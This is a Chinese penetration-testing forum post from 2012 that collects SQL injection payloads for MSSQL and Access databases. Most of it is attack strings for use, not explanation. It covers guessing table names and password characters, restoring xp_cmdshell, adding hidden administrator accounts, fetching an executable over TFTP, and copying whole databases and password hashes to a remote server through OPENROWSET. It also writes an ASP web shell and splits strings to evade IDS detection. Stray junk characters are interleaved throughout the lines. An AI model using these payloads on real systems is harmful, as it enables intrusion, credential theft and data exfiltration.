中国网络渗透测试联盟

标题: SQL注入语句2 [打印本页]

作者: admin    时间: 2012-9-15 14:32
标题: SQL注入语句2
1..判断有无注入点
& T8 ~* z0 e$ b7 l; and 1=1 and 1=2
0 N: d/ ~  a0 L1 _# W& r! P$ ^  J5 T7 h+ k' Y  J3 ?

+ t: g5 _4 @2 S' T0 G2.猜表一般的表的名称无非是admin adminuser user pass password 等.. 2 T% J, K; n8 K# V
and 0<>(select count(*) from *) - C- F8 y& m7 y/ j
and 0<>(select count(*) from admin) ---判断是否存在admin这张表
6 ?- z3 p' v2 s
9 ]) L" q9 |0 B5 j
3 v% }+ h$ ~& p. p' ~3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个
  b1 K$ [4 J& V. L* pand 0<(select count(*) from admin) 0 e, r9 V3 O5 `4 k& ^7 }
and 1<(select count(*) from admin) $ H9 v+ O2 e, V8 c* G1 s
猜列名还有 and (select count(列名) from 表名)>0# p( N7 t: y7 `5 I
1 w* D$ S; p" s# ]3 d& _

/ ?6 `# _5 ~2 ?/ F, u3 K. V2 ^4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称.
) P: n+ V( }. S% R  x- h% xand 1=(select count(*) from admin where len(*)>0)-- - x9 a2 K' c& Y% T
and 1=(select count(*) from admin where len(用户字段名称name)>0)
% b0 ]: @. D! v* B4 cand 1=(select count(*) from admin where len(密码字段名称password)>0) + g) Y  Q6 ^9 h. z) x: [8 h

  a( A! Q7 ~% N# L5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止
3 S& @7 H! k4 Z7 V9 Qand 1=(select count(*) from admin where len(*)>0)
5 Q& _" r! u8 x1 o, F, I8 I- c2 Fand 1=(select count(*) from admin where len(name)>6) 错误
% K; S5 I! Z2 _' \7 Jand 1=(select count(*) from admin where len(name)>5) 正确 长度是6 + B7 Z# a3 R3 @$ H4 ]
and 1=(select count(*) from admin where len(name)=6) 正确 ; x- D. o: ]. \
1 `& f9 T/ N. C% Q  _. O+ e1 Q: r
and 1=(select count(*) from admin where len(password)>11) 正确
/ h: `4 S& ?8 v) [2 c/ X: h0 qand 1=(select count(*) from admin where len(password)>12) 错误 长度是12 5 w8 ~$ T( z- n) Q
and 1=(select count(*) from admin where len(password)=12) 正确
  }+ l5 [5 S/ X7 u" Z" w猜长度还有 and (select top 1 len(username) from admin)>59 ~& J! P/ W8 n

7 \2 w  Z) l( F3 j0 I* I( z+ F
: r7 D$ ?% z9 g4 |) c, Z( {2 r6.猜解字符
5 b9 X# i( Q% A, a9 aand 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位 ( o4 o* q1 y- G
and 1=(select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位 6 g3 a; T1 Q) H( \9 m$ T
就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了 0 i  x0 Z. e2 I. D. q5 O( P# ]

- G1 n- ]6 A" ]8 B% w猜内容还有  and (select top 1 asc(mid(password,1,1)) from admin)>50  用ASC码算0 }5 T) K5 m: b
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) -- 6 u) v8 V/ O. k
这个查询语句可以猜解中文的用户和密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符.
7 J9 m% T& x; \. G& ?
1 R' j4 Z$ |* ?& r& l2 Jgroup by users.id having 1=1-- : D7 A3 _( y3 B* ]4 G! e1 V& w: i
group by users.id, users.username, users.password, users.privs having 1=1-- ' d* s" j  |2 }* k5 U; \, Z
; insert into users values( 666, attacker, foobar, 0xffff )-- ! k: D! ?3 N/ D! }6 s7 a

" _1 I; Q6 a; YUNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable-
$ O3 ~' ?- W' I, |; kUNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id)- " _3 \8 d6 {* _/ _
UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id,login_name)-
3 H+ k* N& z, a7 ?/ S- ?UNION SELECT TOP 1 login_name FROM logintable- 6 w  m9 ?4 r9 D! i% J! w
UNION SELECT TOP 1 password FROM logintable where login_name=Rahul-- 9 `! ?( j; x7 ~5 F5 _9 V
% I5 d  [" S" z
看服务器打的补丁=出错了打了SP4补丁 7 a( D/ X% x6 K; n& [
and 1=(select @@VERSION)--
( P! Y9 W$ |' T. z" a/ }0 `# W3 v
$ ~2 j: F7 c) b2 t- J1 Z: D: I看数据库连接账号的权限,返回正常,证明是服务器角色sysadmin权限。 # \7 z. Q) V. p( e; w  `4 w9 w2 ?8 L
and 1=(SELECT IS_SRVROLEMEMBER(sysadmin))-- 8 p) |0 C0 ~& b9 E/ F

! {- `6 @( f1 G- U* e9 X判断连接数据库帐号。(采用SA账号连接 返回正常=证明了连接账号是SA) ( W6 \+ c) K, C7 j& r" y
and sa=(SELECT System_user)--   h2 B1 h' l0 H1 u2 ]
and user_name()=dbo--
9 g2 q! m7 G9 V% oand 0<>(select user_name()-- 8 @1 y. W, {& T3 g. l0 q0 i
1 A+ G+ \& r+ z0 C) ?) y1 u0 y8 Y
看xp_cmdshell是否删除 : `: G7 v3 f# ]6 ], F% _( i% a
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_cmdshell)--
9 O5 R- e. ?( g3 q( c, X9 W$ W* O! J& }
xp_cmdshell被删除,恢复,支持绝对路径的恢复
  I9 p. J8 J( L3 `: o4 b, W/ `;EXEC master.dbo.sp_addextendedproc xp_cmdshell,xplog70.dll--
" ~# h( z  V) s& f;EXEC master.dbo.sp_addextendedproc xp_cmdshell,c:\inetpub\wwwroot\xplog70.dll-- ; e3 @9 J/ m" q  y
  `  e' g* v9 q7 N; p
反向PING自己实验 " {- |% B( O" \  q
;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";-- 8 Z2 M6 {: f& W, l; D9 Q( z

/ j. m3 s: y) `8 j$ j, V" h加帐号 ) m% G( j9 r0 H8 H3 a1 [
;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add--
  H2 I* N9 n1 v2 d, y* S, E& b5 B& [; _1 A' d4 I' ?/ O' [, u
创建一个虚拟目录E盘:
8 _( \+ |0 O! s4 e, N  o" z) W;declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e:\"--
+ p2 ?" B0 o  Q$ ~4 |% T- Z' ?; e6 F) S2 s0 Z
访问属性:(配合写入一个webshell)
& W( `( q3 V8 c' v  @+ ^declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse + ^! o4 d6 W( s! I# N5 h# y' j

. ~; q3 a" T' ~3 }4 r0 _
$ G& t3 U% a, T+ pMSSQL也可以用联合查询
7 P6 x5 T  _4 w. r, q?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin 8 L$ M' M1 b: S& b* E; {
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union,access也好用)
( x% A5 V  E3 n  F- \$ U5 w; M* Y. l4 s8 E3 [" i+ Z: a

- |  W& q; p% }9 k4 L# J爆库 特殊技巧:%5c=\ 或者把/和\ 修改%5提交 3 H/ o& Z' q. ~( j% H
, n& ~7 }, Z. e; a8 c+ |

1 w7 Y1 ^* n% g5 [3 Q0 }8 Y! U5 W
/ N* W" K7 T. T( `; Z  h" L2 i$ N& Z得到WEB路径
! o# l3 {$ Y0 |5 L9 h5 ~;create table [dbo].[swap] ([swappass][char](255));--
9 u" G* s# R" \! M" X- Z4 wand (select top 1 swappass from swap)=1-- , \4 e! M& s8 i) e. {
;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey=HKEY_LOCAL_MACHINE, @key=SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\, @value_name=/, values=@test OUTPUT insert into paths(path) values(@test)-- , c0 [8 G. G7 c3 t' O
;use ku1;-- ' M% {( G" x' _* z
;create table cmd (str image);-- 建立image类型的表cmd / R9 A8 y8 ]2 f+ k+ t

5 v- @+ }7 u- {' V2 z存在xp_cmdshell的测试过程: - B( Q5 B- @; w
;exec master..xp_cmdshell dir
$ Z( z  ?) b5 x! {# y' R;exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帐号
* y$ U# e3 D. l/ b9 j5 b9 y;exec master.dbo.sp_password null,jiaoniang$,1866574;--
' @1 L2 J9 C( Q) c- ~/ \) N;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;--
, [' Q  M0 c0 f;exec master.dbo.xp_cmdshell net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add;--
, F/ b9 S0 s5 k;exec master.dbo.xp_cmdshell net localgroup administrators jiaoniang$ /add;--
1 ^& T- h- j' sexec master..xp_servicecontrol start, schedule 启动服务
  C8 ~8 R, t; T) x, T/ Uexec master..xp_servicecontrol start, server , G2 z' q( x0 h/ `3 ]
; DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add 3 P' ?$ |7 l# f% P% ?; @+ n# ]0 B
;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add
0 h1 H0 l  w- O+ V; exec master..xp_cmdshell tftp -i youip get file.exe-- 利用TFTP上传文件 ! l: b- X4 ~2 {4 C- x3 y/ _) M
& v5 |8 N1 k9 O& i% y; J3 S
;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\
- ^  f% o1 \5 s- e9 y;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\ " G8 G6 R& T& \* j2 w+ t/ o
;declare @a;set @a=db_name();backup database @a to disk=你的IP你的共享目录bak.dat 7 Y! D" ~$ B4 b; R
如果被限制则可以。
3 }& n8 j  F; I+ R& }select * from openrowset(sqloledb,server;sa;,select OK! exec master.dbo.sp_addlogin hax) 9 V* O+ v" ]. v
$ w" I" B( n6 P! {' D
查询构造:
8 N, D5 E. q4 D! n. qSELECT * FROM news WHERE id=... AND topic=... AND .....
0 o, X  Z* d8 t4 x& H; w: oadminand 1=(select count(*) from [user] where username=victim and right(left(userpass,01),1)=1) and userpass <> : W( h0 ^9 @2 |. K8 o% D6 V
select 123;--
$ i6 S' b7 @0 l% G# \0 Y;use master;--
  W# a( M: x8 X4 c:a or name like fff%;-- 显示有一个叫ffff的用户哈。
5 C$ w* E, O' }7 Oand 1<>(select count(email) from [user]);-- 0 S. @$ p$ b- c+ N" R
;update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where name=ffff;-- " ], \( }9 }5 p$ V
;update [users] set email=(select top 1 id from sysobjects where xtype=u and name=ad) where name=ffff;--
& h# C" g  |* t" _  B3 @) X; ~;update [users] set email=(select top 1 name from sysobjects where xtype=u and id>581577110) where name=ffff;--
0 S; @) X/ i$ f) r( w; G;update [users] set email=(select top 1 count(id) from password) where name=ffff;--
' d! a' v7 L; |6 G8 V7 V" Z! ~) s;update [users] set email=(select top 1 pwd from password where id=2) where name=ffff;--
* \9 x* `# c! w& W;update [users] set email=(select top 1 name from password where id=2) where name=ffff;--
( x) V& m1 s- z7 O6 C" U) \! d上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。
9 h$ N7 u- I& {7 M8 z, k通过查看ffff的用户资料可得第一个用表叫ad
0 @" A  N6 Y- Z- p然后根据表名ad得到这个表的ID 得到第二个表的名字 8 l8 x+ A; z( s3 Y9 D+ W& U
% ]9 G3 I7 n& B9 `  i6 K# ?
insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)--
3 `  l# M' y0 `/ k2 @( ninsert into users values( 667,123,123,0xffff)--
* _+ ~: m3 n8 Z8 D. U  b) ~insert into users values ( 123, admin--, password, 0xffff)-- ) q5 R) E  G9 w) p* y4 x
;and user>0
: u2 T- f' K. R: W3 O;and (select count(*) from sysobjects)>0
: _- J4 p- p" Y8 \4 n;and (select count(*) from mysysobjects)>0 //为access数据库
0 Z0 A7 V% L7 ^, J
1 }2 ~  s" I  i! B; U( e3 J枚举出数据表名 3 _8 d8 n$ Q# Q+ i* ?; U( v
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0);-- 2 w9 n$ a3 X7 ?/ L" w5 c' o* D
这是将第一个表名更新到aaa的字段处。
; O$ K- ~: M3 U9 n  ?, n$ R- ^- Y读出第一个表,第二个表可以这样读出来(在条件后加上 and name<>刚才得到的表名)。
. p8 m2 \6 o  l: A, A;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0 and name<>vote);-- 9 J6 P1 z: u2 b, g& C! J
然后id=1552 and exists(select * from aaa where aaa>5)
2 |) b  j6 E. l0 x4 J6 H读出第二个表,一个个的读出,直到没有为止。 3 K$ M3 k( ^' k! K1 j
读字段是这样:
8 v) _1 t) h* M: y  [) t1 A: d% H: @;update aaa set aaa=(select top 1 col_name(object_id(表名),1));--
0 i! z# {- Y8 g7 f- Q# N然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名
+ S& Y1 g' H5 ?" ?;update aaa set aaa=(select top 1 col_name(object_id(表名),2));-- 1 f6 l, W& E% p) ?$ {. v5 o
然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名
3 f. l# o2 u, \% L% d& Y$ F7 E3 o* ]  b0 ^" t; s
[获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名] 6 V+ z  X4 w: @1 H- ]$ G& ?3 J9 v1 J& O% F
update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>你得到的表名 查出一个加一个]) [ where 条件] select top 1 name from sysobjects where xtype=u and status>0 and name not in(table1,table2,…) 5 x$ T8 W7 }! d2 m
通过SQLSERVER注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组]
4 Q/ `" ~! w; ~8 ]% I. i
3 u$ \  A; b* `* y" Q& I1 `[获得数据表字段名][将字段值更新为字段名,再想法读出这个字段的值就可得到字段名]
: [. e% H( W/ a( K& {' a' W" Aupdate 表名 set 字段=(select top 1 col_name(object_id(要查询的数据表名),字段列如:1) [ where 条件] ! G: _$ a+ t* q% w4 g# a6 p% U$ j

( q% Y& f* c  K) l绕过IDS的检测[使用变量]
0 `% m# S3 j" B;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\
8 d+ l: y+ Z" |  F;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\
+ C0 L6 s/ u# v) s; ~1 [; _; I/ @; u. K" A3 _
1、 开启远程数据库
" X9 \! \, ]1 Q& [: z0 j基本语法   K0 I( ^4 Q- K7 x$ i6 _
select * from OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1 ) " O" b! l  E- Q8 ?. O
参数: (1) OLEDB Provider name
+ i; B- r; q# ]( r- I2、 其中连接字符串参数可以是任何端口用来连接,比如 ) U; Q9 @, W7 p9 d0 ~& W' J$ A! M
select * from OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;, select * from table
5 R. P$ N# z% [+ j- }3.复制目标主机的整个数据库insert所有远程表到本地表。
) l$ r4 H3 }' ~$ @; q% ?2 P
3 ]3 @" g* J9 ^' l& ]2 {9 \基本语法: 6 s# i5 X; {- x$ N2 ?# A
insert into OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1) select * from table2 . _9 `, v7 A  Z% |0 q1 N6 }4 o
这行语句将目标主机上table2表中的所有数据复制到远程数据库中的table1表中。实际运用中适当修改连接字符串的IP地址和端口,指向需要的地方,比如: ! B% m; O! t4 N  o5 `
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from table2
, f, f; @9 n9 }9 qinsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysdatabases)
8 t& D- D  {9 y( ]select * from master.dbo.sysdatabases
. c1 W. b- u8 v! d+ m3 binsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysobjects)
) l7 Z* c: q& Q: i+ Aselect * from user_database.dbo.sysobjects 4 i- H8 s5 c; S, f- T& F% d+ I
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _syscolumns)
- O0 U; p6 N" a: M8 ]select * from user_database.dbo.syscolumns
! d7 N( E+ [$ X" H4 x- M& U% E复制数据库:
/ [8 O& g: ~; _  k) m+ Qinsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from database..table1
8 S4 u; [5 {% O0 minsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table2) select * from database..table2 7 Y. N$ p: z/ v, b: N, C0 ]: t( ^

8 h8 l3 p. B; x$ `, h8 Y6 S复制哈西表(HASH)登录密码的hash存储于sysxlogins中。方法如下:
9 Z6 T4 W" t0 ^# Vinsert into OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysxlogins) select * from database.dbo.sysxlogins : P- O9 r* f6 u( b
得到hash之后,就可以进行暴力破解。
, P. _( q$ v4 p6 x9 J
3 d# q1 J2 ]* S9 X( C遍历目录的方法: 先创建一个临时表:temp
) d4 y; d) h! k: v0 H;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
* z: P, k) k( F( `;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
. r+ A$ R) s; j  S/ M( [;insert into temp(id) exec master.dbo.xp_subdirs c:\;-- 获得子目录列表
$ }- M, R& |. Y+ ]" P/ p;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- 获得所有子目录的目录树结构,并寸入temp表中
: O" e) \1 Q0 N;insert into temp(id) exec master.dbo.xp_cmdshell type c:\web\index.asp;-- 查看某个文件的内容 ! H8 o5 ]0 V+ G; B( o
;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\;-- 4 r0 l* ], i1 `5 R' r. |7 o7 |
;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\ *.asp /s/a;-- - |8 B6 \! @/ g# u
;insert into temp(id) exec master.dbo.xp_cmdshell cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc 1 S9 x# u8 e* D( r
;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- (xp_dirtree适用权限PUBLIC) * Z( P8 n; [- j! Z# w3 A) `+ q# `5 @
写入表: 2 b7 i/ Z: Q1 c
语句1:and 1=(SELECT IS_SRVROLEMEMBER(sysadmin));-- ; H# X" A7 C5 N  Q8 K; f& e1 D
语句2:and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));--
* W# b0 H3 D3 }) T& P( [# d. p, @3 O语句3:and 1=(SELECT IS_SRVROLEMEMBER(setupadmin));-- $ ^. q* T, Q1 d& K0 l
语句4:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--
' V8 U) K' P; P语句5:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));-- 8 F2 G+ z5 @( A0 j5 V& N
语句6:and 1=(SELECT IS_SRVROLEMEMBER(diskadmin));--
( U; T5 `& }7 M2 Y/ y5 n语句7:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));-- 6 ^( J( w+ C3 h- M( s
语句8:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));-- 1 {7 r3 h5 x. G
语句9:and 1=(SELECT IS_MEMBER(db_owner));--
8 a: W" H3 o! b8 V( j6 j  q; [3 {; G  R7 h2 b3 `
把路径写到表中去: 1 ~# w& E1 S0 [$ X9 }& h3 e5 h
;create table dirs(paths varchar(100), id int)-- 8 }. X' r# `# ^) |" O
;insert dirs exec master.dbo.xp_dirtree c:\-- 1 C& h9 I+ p2 ^% i0 a6 l
and 0<>(select top 1 paths from dirs)-- 7 s5 J9 D, ~+ F3 }+ Z- \8 m# L: ^9 E
and 0<>(select top 1 paths from dirs where paths not in(@Inetpub))--
) ]2 g' [! B$ P3 r3 [;create table dirs1(paths varchar(100), id int)--
0 S" [0 l) p# M;insert dirs exec master.dbo.xp_dirtree e:\web-- 5 M" n* v- i3 C; Z
and 0<>(select top 1 paths from dirs1)-- 3 C9 }& a" Q2 x. p4 a

  k( {% c: L2 G  l, G) ]8 V# Y把数据库备份到网页目录:下载 0 Y; L& Q0 [' i' {/ [+ w
;declare @a sysname; set @a=db_name();backup database @a to disk=e:\web\down.bak;--
* A: r4 H/ K" ]0 \! G3 D' S: O+ \' \! U. v& C2 `! w6 m
and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc) * u. K4 A# y/ s/ s- I4 R; W/ [
and 1=(Select Top 1 col_name(object_id(USER_LOGIN),1) from sysobjects) 参看相关表。 # g% w8 c5 J7 Z! ]) J6 z8 ~
and 1=(select user_id from USER_LOGIN) ' O9 h& N% a: ~: N$ _
and 0=(select user from USER_LOGIN where user>1) ; a( \& q7 T1 l; D; A3 w1 n1 ^$ \5 n
8 c1 l9 S8 k- |% q
-=- wscript.shell example -=- * ^0 U/ ~, V: M
declare @o int
$ G4 i# _( N4 B1 i8 [7 @, aexec sp_oacreate wscript.shell, @o out ! t4 v6 i7 e& j9 O) s; B- v$ J5 y/ i
exec sp_oamethod @o, run, NULL, notepad.exe * C" V! G7 }5 Y, h! V6 Y" j
; declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, notepad.exe--
+ b% F- Q3 l* Z9 Y0 v4 X2 Q/ j% Q( W  V5 R. U. s
declare @o int, @f int, @t int, @ret int
% @- z$ m: Q) K$ e# F$ u, X) bdeclare @line varchar(8000)
! I, s$ \1 n8 B) s$ f: E+ Nexec sp_oacreate scripting.filesystemobject, @o out * m9 R* g# K4 J1 ~% M: ]4 `2 ~
exec sp_oamethod @o, opentextfile, @f out, c:\boot.ini, 1 3 ?& }* P2 N; q' {2 G( ~) ^* s
exec @ret = sp_oamethod @f, readline, @line out ( n' |: [7 d6 @4 @. q
while( @ret = 0 ) 4 i" |& n' V+ P" \
begin
' D7 `" |+ F" Y7 [2 }print @line
$ Q% N. e( h" x, n3 l' Xexec @ret = sp_oamethod @f, readline, @line out 4 }3 c4 D7 J, X
end , V) ~+ @5 A6 `- ^( B( M! \: i

* U4 W4 s9 A+ `% I3 Kdeclare @o int, @f int, @t int, @ret int
* i1 x% u$ Z* A; {: Q8 Z4 w- hexec sp_oacreate scripting.filesystemobject, @o out ! `; l2 c" B, t7 a
exec sp_oamethod @o, createtextfile, @f out, c:\inetpub\wwwroot\foo.asp, 1
0 m, _/ x8 g8 _8 x' |& G# J# w3 F2 ?exec @ret = sp_oamethod @f, writeline, NULL,
" Z" S* ?4 c( z! r<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %> ) \5 _7 s* i! ~- e

4 {* v* p  h7 k; c) _declare @o int, @ret int ) @5 |) s& f! l6 h: }2 }3 [$ ?
exec sp_oacreate speech.voicetext, @o out
) i' [' y" M! G2 U6 Nexec sp_oamethod @o, register, NULL, foo, bar 7 A. ~; g! [, a6 S  @: M; L3 d
exec sp_oasetproperty @o, speed, 150
! r7 X' |/ c: K6 iexec sp_oamethod @o, speak, NULL, all your sequel servers are belong to,us, 528
5 C; N! j( u6 m$ Y) S5 Lwaitfor delay 00:00:05 ) t& k4 A0 R+ S% Q0 {% O( |

5 t; h% _& K! t8 T  d; declare @o int, @ret int exec sp_oacreate speech.voicetext, @o out exec sp_oamethod @o, register, NULL, foo, bar exec sp_oasetproperty @o, speed, 150 exec sp_oamethod @o, speak, NULL, all your sequel servers are belong to us, 528 waitfor delay 00:00:05--
. a; |' @2 R2 X1 z$ n% ^
. ]1 w9 c% s6 \2 Mxp_dirtree适用权限PUBLIC
& K" s/ Z- ], L  mexec master.dbo.xp_dirtree c:返回的信息有两个字段subdirectory、depth。Subdirectory字段是字符型,depth字段是整形字段。
7 g' L( U) O5 l; }; Hcreate table dirs(paths varchar(100), id int) & X* B7 O, f. B4 S0 J9 m, Y6 N( L
建表,这里建的表是和上面xp_dirtree相关连,字段相等、类型相同。
$ l' S- L8 i8 i) f$ f4 g4 [* Xinsert dirs exec master.dbo.xp_dirtree c:只要我们建表与存储进程返回的字段相定义相等就能够执行!达到写表的效果,一步步达到我们想要的信息!
6 L; r: ]0 ~* J/ ]0 a




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2